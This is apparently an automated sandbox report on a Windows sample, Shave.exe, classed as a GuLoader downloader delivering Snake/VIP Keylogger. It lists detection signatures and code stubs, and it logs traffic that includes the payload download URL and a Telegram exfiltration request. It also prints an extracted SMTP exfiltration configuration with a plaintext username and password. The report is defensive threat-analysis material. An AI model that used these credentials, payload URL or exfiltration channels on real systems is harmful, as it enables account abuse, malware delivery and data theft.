Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shave.exe

Overview

General Information

Sample name:Shave.exe
Analysis ID:1562047
MD5:51000c141b602569cf44b0f8bec9ecb8
SHA1:d7b819dbc26b3e66c99d233c5c7fc86492e626dd
SHA256:5b19a26d6e86bbcd6d454baee6ae7c77f1c4ca6017ad965eb79098308346f383
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Shave.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\Shave.exe" MD5: 51000C141B602569CF44B0F8BEC9ECB8)
    • Shave.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\Shave.exe" MD5: 51000C141B602569CF44B0F8BEC9ECB8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "mukesh@cipmach.com", "Password": "mail@2019$", "Host": "mail.cipmach.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000000.00000002.2342460807.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000000.00000002.2342825551.0000000004332000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.63.24, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Shave.exe, Initiated: true, ProcessId: 7044, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49886
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T07:08:53.389422+010028033053Unknown Traffic192.168.2.549777172.67.177.134443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T07:08:49.051470+010028032742Potentially Bad Traffic192.168.2.549757193.122.130.080TCP
            2024-11-25T07:08:51.707734+010028032742Potentially Bad Traffic192.168.2.549757193.122.130.080TCP
            2024-11-25T07:08:57.145241+010028032742Potentially Bad Traffic192.168.2.549779193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T07:08:42.598864+010028032702Potentially Bad Traffic192.168.2.549751185.244.144.6880TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mukesh@cipmach.com", "Password": "mail@2019$", "Host": "mail.cipmach.com", "Port": "587", "Version": "4.4"}
            Source: Shave.exeVirustotal: Detection: 45%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Shave.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Shave.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49771 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
            Source: Shave.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_004065DA FindFirstFileW,FindClose,3_2_004065DA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_004059A9
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 0015F45Dh3_2_0015F2C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 0015F45Dh3_2_0015F4AC
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 0015F45Dh3_2_0015F52F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 0015FC19h3_2_0015F974
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0ECA6h3_2_04B0E9D8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B09280h3_2_04B08FB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B07EB5h3_2_04B07B78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0E386h3_2_04B0E0B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B00741h3_2_04B00498
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then mov esp, ebp3_2_04B0B081
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B06733h3_2_04B06488
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B00B99h3_2_04B008F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0C396h3_2_04B0C0C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B062D9h3_2_04B06030
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0BF06h3_2_04B0BC38
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0DEF6h3_2_04B0DC28
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B032B1h3_2_04B03008
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B03709h3_2_04B03460
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B002E9h3_2_04B00040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B01449h3_2_04B011A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B018A1h3_2_04B015F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0CCB6h3_2_04B0C9E8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0C826h3_2_04B0C558
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B00FF1h3_2_04B00D48
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0E816h3_2_04B0E548
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B02151h3_2_04B01EA8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0F5C6h3_2_04B0F2F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B05179h3_2_04B04ED0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B07571h3_2_04B072C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B048C9h3_2_04B04620
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B06CC1h3_2_04B06A18
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B07119h3_2_04B06E70
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B04D21h3_2_04B04A78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0D146h3_2_04B0CE78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0F136h3_2_04B0EE68
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B01CF9h3_2_04B01A50
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B02E59h3_2_04B02BB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0BA76h3_2_04B0B7A8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0DA66h3_2_04B0D798
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B05A29h3_2_04B05780
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0FA56h3_2_04B0F788
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B05E81h3_2_04B05BD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B079C9h3_2_04B07720
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B055D1h3_2_04B05328
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0B5E6h3_2_04B0B318
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B025A9h3_2_04B02300
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B0D5D6h3_2_04B0D308
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B02A01h3_2_04B02758
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B36970h3_2_04B36678
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B36347h3_2_04B35FD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3FDA8h3_2_04B3FAB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B35986h3_2_04B356B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B38FB0h3_2_04B38CB8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3A798h3_2_04B3A4A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3154Eh3_2_04B31280
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B32756h3_2_04B32488
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3BF80h3_2_04B3BC88
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3B5F0h3_2_04B3B2F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3CDD8h3_2_04B3CAE0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3079Eh3_2_04B304D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B377C8h3_2_04B374D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B33996h3_2_04B336C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3E5C0h3_2_04B3E2C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3B128h3_2_04B3AE30
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B33506h3_2_04B33238
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B354F6h3_2_04B35228
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3C910h3_2_04B3C618
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3E0F8h3_2_04B3DE00
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B37300h3_2_04B37008
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3D768h3_2_04B3D470
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B34746h3_2_04B34478
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B38158h3_2_04B37E60
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3EF50h3_2_04B3EC58
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3030Eh3_2_04B30040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B39940h3_2_04B39648
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B31E47h3_2_04B31BA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B33076h3_2_04B32DA8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3D2A0h3_2_04B3CFA8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3EA88h3_2_04B3E790
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B35066h3_2_04B34D98
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B37C90h3_2_04B37998
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B39478h3_2_04B39180
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B310BEh3_2_04B30DF0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B38AE8h3_2_04B387F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B322C6h3_2_04B31FF8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B342B6h3_2_04B33FE8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3F8E0h3_2_04B3F5E8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3A2D0h3_2_04B39FD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3BAB8h3_2_04B3B7C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3DC30h3_2_04B3D938
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3F418h3_2_04B3F120
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B38620h3_2_04B38328
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B319DEh3_2_04B31710
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B39E08h3_2_04B39B10
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B32BE6h3_2_04B32918
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B34BD7h3_2_04B34908
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B30C2Eh3_2_04B30960
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3AC60h3_2_04B3A968
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B3C448h3_2_04B3C150
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B33E26h3_2_04B33B58
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B36E38h3_2_04B36B40
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04B35E16h3_2_04B35B48
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04E41FE8h3_2_04E41CF0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04E41190h3_2_04E40E98
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04E40338h3_2_04E40040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04E41B20h3_2_04E41828
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04E40CC8h3_2_04E409D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04E41658h3_2_04E41360
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 04E40801h3_2_04E40508
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then push 00000000h3_2_379F50C7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_379F0A10
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_379F0A01
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_379F0D26
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 38312C19h3_2_38312968
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831DC51h3_2_3831D9A8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 383131E0h3_2_38312DC8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831E0A9h3_2_3831DE00
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831FAB9h3_2_3831F810
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_38310040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831CF49h3_2_3831CCA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831D3A1h3_2_3831D0F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 383131E0h3_2_3831310E
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831D7F9h3_2_3831D550
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 383131E0h3_2_38312DC2
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831E501h3_2_3831E258
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831E959h3_2_3831E6B0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 38310D0Dh3_2_38310B30
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 38311697h3_2_38310B30
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831EDB1h3_2_3831EB08
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831F209h3_2_3831EF60
            Source: C:\Users\user\Desktop\Shave.exeCode function: 4x nop then jmp 3831F661h3_2_3831F3B8

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.5:49886 -> 199.79.63.24:587
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 185.244.144.68 185.244.144.68
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49751 -> 185.244.144.68:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49779 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49757 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49777 -> 172.67.177.134:443
            Source: global trafficTCP traffic: 192.168.2.5:49886 -> 199.79.63.24:587
            Source: global trafficHTTP traffic detected: GET /oxzGOftLtQcGlWZ214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49771 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /oxzGOftLtQcGlWZ214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
